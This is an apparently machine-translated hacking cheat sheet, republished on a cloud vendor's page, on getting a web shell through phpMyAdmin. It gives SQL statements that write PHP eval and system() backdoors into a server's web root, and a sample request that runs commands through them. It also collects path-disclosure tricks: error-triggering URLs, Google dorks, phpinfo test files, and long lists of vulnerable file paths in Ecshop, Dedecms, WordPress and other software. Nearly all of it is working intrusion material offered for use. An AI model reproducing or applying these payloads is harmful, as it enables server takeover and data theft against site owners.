phpMyAdmin Back Shell Method summary

Source: Internet
Author: User
Tags explode mysql create php explode phpinfo

Method One:
CREATE TABLE ' mysql '. ' Xiaoma ' (' xiaoma1 ' TEXT not NULL);
INSERT into ' MySQL ', ' xiaoma ' (' xiaoma1 ') VALUES (' <?php @eval ($_post[xiaoma])?> ');
SELECT xiaomafrom study into OUTFILE ' e:/wamp/www/7.php ';
----above at the same time, in the database: MySQL create a table named: Xiaoma, Field xiaoma1, export to e:/wamp/www/7.php
A word connection password: Xiaoma


Method Two:
Create TABLE Xiaoma (xiaoma1 text not NULL);
Insert into Xiaoma (XIAOMA1) VALUES (' <?php eval ($_post[xiaoma])?> ');
Select Xiaoma1 from Xiaoma to outfile ' e:/wamp/www/7.php ';
Drop TABLE IF EXISTS xiaoma;


Method Three:


Read file contents: Select Load_file (' e:/xamp/www/s.php ');


Write a word: select ' <?php @eval ($_post[cmd])?> ' into OUTFILE ' e:/xamp/www/xiaoma.php '


CMD execution permissions: select ' <?php echo \ ' <pre>\ '; system ($_get[\ ' cmd\ '); echo \ ' </pre>\ ';?> ' into OUTFILE ' e:/xamp/www/xiaoma.php '




Method Four:
Select Load_file (' e:/xamp/www/xiaoma.php ');


Select ' <?php echo \ ' <pre>\ '; system ($_get[\ ' cmd\ '); echo \ ' </pre>\ ';?> ' into OUTFILE ' e:/xamp/www/xiaoma.php '

Then visit the Site Directory: Http://www.xxxx.com/xiaoma.php?cmd=dir

PHP Explode Path Method collection:

1. Single-Quote Burst path
Description
Add single quotation marks directly after the URL, requiring that the single quotation mark is not filtered (Gpc=off) and the server returns an error message by default.
www.xxx.com/news.php?id=149′


2, error parameter value explosion path
Description
Change the value of the parameter to be submitted to an error value, such as-1. -99999 single quotes are filtered when you may try.
Www.xxx.com/researcharchive.php?id=-1


3. Google explode path
Description
Combined with the keyword and site syntax to search the page snapshot of the error page, common keywords have warning and fatal error. Note that if the target site is a level two domain name, site is connected to its top-level domain name, so that it gets much more information.
SITE:XXX.EDU.TW Warning
Site:xxx.com.tw "Fatal error"


4. test file explosion path
Description
There are test files in the root directory of many Web sites, and the script code is usually phpinfo ().
www.xxx.com/test.php
www.xxx.com/ceshi.php
www.xxx.com/info.php
www.xxx.com/phpinfo.php
www.xxx.com/php_info.php
www.xxx.com/1.php


5, phpMyAdmin explosion path
Description
Once you find the admin page for phpMyAdmin and then access some of the specific files in that directory, you are likely to burst the physical path. As for the phpMyAdmin address can be used wwwscan such tools to sweep, you can also choose Google. PS: Some BT websites will be written as phpMyAdmin.
1./phpmyadmin/libraries/lect_lang.lib.php
2./phpmyadmin/index.php?lang[]=1
3./phpmyadmin/phpinfo.php
4. Load_file ()
5./phpmyadmin/themes/darkblue_orange/layout.inc.php
6./phpmyadmin/libraries/select_lang.lib.php
7./phpmyadmin/libraries/lect_lang.lib.php
8./phpmyadmin/libraries/mcrypt.lib.php


6. configuration file Find path
Description
If the injection point has file Read permissions, you can manually load_file or tool to read the configuration file, and then look for path information (typically at the end of the file). Web server and PHP configuration file default path under each platform can be checked online, here are a few common.


Windows:
C:\windows\php.ini PHP configuration file
C:\windows\system32\inetsrv\MetaBase.xml IIS Virtual Host configuration file


Linux:
/etc/php.ini PHP configuration file
/etc/httpd/conf.d/php.conf
/etc/httpd/conf/httpd.conf Apache configuration file
/usr/local/apache/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache/conf/extra/httpd-vhosts.conf Virtual Directory configuration file


7, Nginx file type Error resolution explosion path
Description
This is the method that was inadvertently discovered yesterday, of course, requires the Web server is Nginx, and there is a file type parsing vulnerability. Sometimes add/x.php after the picture address, the picture will not only be executed as PHP file, but also may burst the physical path.
www.xxx.com/top.jpg/x.php


8. Other
Dedecms
/member/templets/menulit.php
plus/paycenter/alipay/return_url.php
plus/paycenter/cbpayment/autoreceive.php
paycenter/nps/config_pay_nps.php
plus/task/dede-maketimehtml.php
plus/task/dede-optimize-table.php
plus/task/dede-upcache.php


Wp
wp-admin/includes/file.php
wp-content/themes/baiaogu-seo/footer.php


Ecshop Mall System Burst Path Vulnerability file
/api/cron.php
/wap/goods.php
/temp/compiled/ur_here.lbi.php
/temp/compiled/pages.lbi.php
/temp/compiled/user_transaction.dwt.php
/temp/compiled/history.lbi.php
/temp/compiled/page_footer.lbi.php
/temp/compiled/goods.dwt.php
/temp/compiled/user_clips.dwt.php
/temp/compiled/goods_article.lbi.php
/temp/compiled/comments_list.lbi.php
/temp/compiled/recommend_promotion.lbi.php
/temp/compiled/search.dwt.php
/temp/compiled/category_tree.lbi.php
/temp/compiled/user_passport.dwt.php
/temp/compiled/promotion_info.lbi.php
/temp/compiled/user_menu.lbi.php
/temp/compiled/message.dwt.php
/temp/compiled/admin/pagefooter.htm.php
/temp/compiled/admin/page.htm.php
/temp/compiled/admin/start.htm.php
/temp/compiled/admin/goods_search.htm.php
/temp/compiled/admin/index.htm.php
/temp/compiled/admin/order_list.htm.php
/temp/compiled/admin/menu.htm.php
/temp/compiled/admin/login.htm.php
/temp/compiled/admin/message.htm.php
/temp/compiled/admin/goods_list.htm.php
/temp/compiled/admin/pageheader.htm.php
/temp/compiled/admin/top.htm.php
/temp/compiled/top10.lbi.php
/temp/compiled/member_info.lbi.php
/temp/compiled/bought_goods.lbi.php
/temp/compiled/goods_related.lbi.php
/temp/compiled/page_header.lbi.php
/temp/compiled/goods_script.html.php
/temp/compiled/index.dwt.php
/temp/compiled/goods_fittings.lbi.php
/temp/compiled/myship.dwt.php
/temp/compiled/brands.lbi.php
/temp/compiled/help.lbi.php
/temp/compiled/goods_gallery.lbi.php
/temp/compiled/comments.lbi.php
/temp/compiled/myship.lbi.php
/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
/includes/modules/cron/auto_manage.php
/includes/modules/cron/ipdel.php


Ucenter Blast Path
ucenter\control\admin\db.php


Dzbbs
Manyou/admincp.php?my_suffix=%0a%0dtoby57


Z-blog
admin/fckeditor/editor/dialog/fck%5fspellerpages/spellerpages/server%2dscripts/spellchecker.php


php168 Blast Path
Admin/inc/hack/count.php?job=list
Admin/inc/hack/search.php?job=getcode
Admin/inc/ajax/bencandy.php?job=do
Cache/mysqltime.txt


Phpcms2008-sp4
Registered user Access after login
Phpcms/corpandresize/process.php?pic=. /images/logo.gif


Bo-blog
Poc:
/go.php/<[evil Code]
Cmseasy website Path Vulnerability
The vulnerability appears in the menu_top.php file
lib/mods/celive/menu_top.php
/lib/default/ballot_act.php
lib/default/special_act.php

phpMyAdmin Back Shell Method summary

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.